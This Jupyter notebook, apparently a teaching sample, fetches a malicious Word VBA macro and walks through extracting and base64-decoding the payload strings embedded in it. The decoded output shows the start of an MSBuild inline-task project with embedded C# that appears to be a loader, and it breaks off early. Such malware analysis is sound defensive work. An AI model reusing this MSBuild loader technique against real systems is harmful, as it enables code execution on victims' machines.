## This is a sample Jupyter notebook that analyzes a base64 encoded payload in a malicous .doc VBA macro

Fetch the malicious macro text as noted in the tweet https://twitter.com/JohnLaTwC/status/1089572501523378176


In [23]:
import requests
 
url = "https://gist.githubusercontent.com/JohnLaTwC/230485a13c49501279e023ad4b9510e2/raw/6dccac89d73030cc4c69c2edbfb9a5557482c76c/9e910797589da01a4b13ecb7fcd58f81dfc18784dd6ed4996e5a5f8f1f95e224"
r = requests.get(url)
print (f"Fetched {len(r.content)} bytes")
macro_text = r.content.decode()

Fetched 20453 bytes


### There are many lines like this that contain an encoded payload.  Let's extract them

```
decodeBase64("c0V4YW1wbGU...");
```

In [24]:
encoded_lines = [s for s in macro_text.split() if 'decodeBase64("' in s]

In [25]:
# show example line
encoded_lines[0]

'decodeBase64("PFByb2plY3QgVG9vbHNWZXJzaW9uPSI0LjAiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL2RldmVsb3Blci9tc2J1aWxkLzIwMDMiPgogICAgPFRhcmdldCBOYW1lPSJIZWxsbyI+CiAgICAgICAgPENsYXM=");'

### Let's extract just the base64 encoded content
We'll do this by using a regex to match the call to decodeBase64 in the macro with the b64 encoded literal string.

In [26]:
# example extracting the b64 literal string using re.match  

import re 
demo_line = encoded_lines[0]
match_obj = re.match(r'decodeBase64\("(.*)"\);', demo_line,re.M|re.I)
decode = ''
if match_obj is not None:
    decode = match_obj.group(1)
decode 

'PFByb2plY3QgVG9vbHNWZXJzaW9uPSI0LjAiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL2RldmVsb3Blci9tc2J1aWxkLzIwMDMiPgogICAgPFRhcmdldCBOYW1lPSJIZWxsbyI+CiAgICAgICAgPENsYXM='

### Now decode it
The output from the previous Jupyter command is stored in a variable named underscore (_).  Pass that into Python's base64 decode function

In [27]:
# You should see a decoded line that starts the XML header on a MSBuild file: <Project ...
import base64
base64.b64decode(_).decode()

'<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">\n    <Target Name="Hello">\n        <Clas'

In [28]:
# let's put it all together and run this extraction and decode over every line in the macro
import re
import base64
for s in encoded_lines:
    match_obj = re.match(r'decodeBase64\("(.*)"\);', s)
    if match_obj is not None:
        print(base64.b64decode(match_obj.group(1)).decode())

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
    <Target Name="Hello">
        <Clas
sExample />
    </Target>
    <UsingTask
        TaskName="ClassExample"
        TaskFactory="CodeTaskFactory"
        AssemblyF
ile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
            <Task>
        <Code Type="Clas
s" Language="cs">
            <![CDATA[
                using System;
                using Microsoft.Build.Framework;
         
       using Microsoft.Build.Utilities;
                using System.Runtime.InteropServices;
                using System.Net;

                using System.Net.NetworkInformation;
                using System.IO;
                using System.Linq;
       
         using System.Security.Cryptography;

                public class ClassExample :  Task, ITask
                {
       
             [Flags]
                    public enum AllocationType : uint
                    {
